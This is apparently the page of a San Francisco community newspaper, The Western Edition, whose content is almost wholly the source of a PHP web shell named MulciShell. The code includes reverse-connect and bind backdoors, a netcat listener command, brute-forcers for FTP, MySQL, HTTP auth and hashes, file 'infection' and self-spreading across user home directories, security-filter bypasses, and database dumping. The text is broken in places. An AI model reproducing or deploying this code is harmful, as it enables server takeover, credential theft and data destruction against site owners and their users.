The Western Edition - Community Newspaper

Alamo Square

Fillmore Jazz

Hayes Valley

Nihonmachi

Panhandle

Bay Area

Bay View

"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("//public_html//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "

"; break; case 'dark': echo ""; break; default: echo " "; break; } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "

Server IP	Your IP	Disk space	Safe_mode?	Open_BaseDir?	System	Server software	Disabled functions	ID	Shell location
$serv	$addr	$space of $total	$safe_mode	$open_basedir	$uname	$soft	$disable	$idval	".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."

"; foreach($links as $val=>$addr) echo "[ $val ]"; echo "

"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "

MD5: ".md5($e)."nSHA1: ".sha1($e)."nCrypt: ".crypt($e)."nCRC32: ".crc32($e)."nBase64 Encoded: ".base64_encode($e)."nBase64 decoded: ".base64_decode($e)."nURL encode: ".urlencode($e)."nURL decode: ".urldecode($e)."nBin2Hex ".bin2hex($e)."nDec2Hex: ".dechex($e)."

Input:
"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully
"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,""); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files
Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted
"; $success++; } else { echo "Failed to delete file $file
"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files
"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file
"; $success++; } else { echo "Failed to change mode for $file
"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files
"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...
"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass
"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...
"; $show=0;} } } else echo "Failed to connect!
"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http://+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...
"; } } echo "Complete
"; } elseif(isset($_POST['mysqlcrack'])) { $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1rn"; $header.="Host: $con_urlrn"; $header.="Authorization: Basic $encodern"; $header.="Connection: Closernrn"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP/d+.d+ 200+/",$tmp)) { echo "Password found! Password=$pass

"; break 2; } } } } echo "Done
"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open
"; $sport++; } break; default: echo "Invalid request
"; } } if(isset($_POST['find_forums'])) { echo "[ Forum locator ]

"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path
"; $found++; continue; } } } } echo "Scan complete. Found $found forums

"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php
"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "[ Config locator ]

"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs

"; } if(isset($_POST['execmd'])) {echo "";} if(isset($_POST['execphp'])) {echo "";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created
"; else echo "Failed to create file
"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created
"; else echo "Failed to create directory
"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo " Address: Port:

Listen with netcat by executing 'nc -l -n -v -p 1337'

Note: Be sure to foward your port first "; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program<

/font>
"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.
"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo ""; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times
":"Failed to spread the shell.
"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0rn"; $header.="Host: searchy.protecus.dern"; $header.="Connection: Closernrn"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "Do you *really* want to kill the shell?

"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.
"; else echo "Failed to delete shell
"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "Security overview"; "

PHP Version	Safe mode	Open_Basedir	Magic_Quotes	Register globals	Remote includes	Read /etc/passwd?	MySQL	cURL
$ver	$safe_mode	$open_basedir	$magic_quotes_on	$register_globals_on	$include_on	$etc_passwd	$mysql_on	$curl_on

"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: $URL"; } else echo "Enumeration failed
"; break; } echo "
"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected
"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "

Current location: ";for($p=0;$p$current[$p]/"; } echo "

"; if(isset($_GET['d'])) echo ""; else echo ""; echo ""; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo ""; continue; } echo ""; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo ""; } echo "

File	Size	Owner/group	Perms	Writable	Modified	Action
..	$size	$own/$grp	$ch	$write	$mod	None
$f	$size	$own/$grp	$ch	$write	$mod
$f	$size	$own/$grp	$ch	$write	$mod

With checked file(s):
"; function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo " "; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!
"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost [Logout]"; echo ""; echo "

"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo ""; while($r=mysql_fetch_assoc($res)) echo ""; mysql_free_result($res); echo "

Proc ID	Host	DB	Command	Time
$r[Id]	$r[Host]	$r[db]	$r[Command]	$r[Time]

"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo ""; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo ""; } echo "

Database	Table count	Download	Drop
$your_base[Database]	$tbl_count	Download	Drop

"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo ""; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo ""; } echo "

Table	Column count	Dump	Drop
$tblc[0]	$fc	Dump	Drop

"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$yTable updated!
"; echo "Go back

"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo ""; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo ""; if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted
"; else echo "Failed to delete row
"; echo ""; } echo "[Insert new row]"; echo ""; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo ""; } echo ""; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo ""; for($i=0;$i".htmlspecialchars($select[$i]).""; } echo ""; echo ""; } echo "

$col[Field]
Edit	Delete

"; echo ""; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo ""; if(mysql_num_rows($selector)>249) echo ""; } else echo "Next"; echo "

"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################nn"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo ""; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k"; if(@mysql_query($query)) echo "Row inserted
"; else echo "Failed to insert row
"; echo ""; } } } function SQLDrop() { echo ""; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped
"; else echo "Failed to drop database $_GET[dropdb]
"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped
"; else echo "Failed to drop table $_GET[droptbl]
"; } else { echo "Invalid request
"; } } else echo "Failed to connect
"; echo ""; } function db_create() { echo ""; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]
"; } else echo "Failed to connect
"; } else echo "Enter a DB name
"; echo ""; } function table_create() { echo ""; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!
"; } else echo "Enter a table name
"; echo ""; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile']; if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!
"; else echo "File deleted
"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo " "; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

".htmlspecialchars($file_out)."

"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!
"; @$fh=fopen($_POST['dest'],'r'); echo "

".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."

"; @fclose($fh); } else echo "Failed to copy file
"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo "

";
         @include($_POST['file_bypass']);
         echo "

"; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE "$_POST[sql_file]" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]
"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "

Security (open_basedir) bypassers
Bypass using cURL	Bypass using tempnam()
Read file:	Write file:
Bypass using copy()	Bypass using include()
Copy to: File to copy:	Path to file:
Bypass using SQL LOAD INFILE [Login to SQL server first]
[Existing] Database to store temporary table: Temporary table:

"; } function brute_force() { echo ""; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo ""; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd
"; } } function disable_sec() { @$ini=fopen("php.ini","w "); @fwrite($ini,"disable_functions= open_basedir=Off safe_mode=Off safe_mode_gid=Off remote_includes=On "); @$hta = fopen(".htaccess","w "); @fwrite($hta," SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off "); @fclose($ini); @fclose($hta); } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "

$dir"."$file

"; sql_rep_search("/home/"); echo "

Databases

"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...
"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i"; } continue; } @fclose($fh); } echo "

Database parser
Quote delimiter (usually ` or '): Columns to retrieve (separate by commas): Use predefined column match (user+pass+salt): Path to DB dump: Upload DB dump:
Find database Backups
Only search within local path:

"; } function show_tools() { echo "

Tools
Forum locator	Config locator
Passwd file:	Passwd file:
Port scanner	Search
Host: Start port: Start port: End Port: Using:	Finish this next

"; } function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("","/",$d); $d=str_replace("//","/",$d); return $d; } function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; }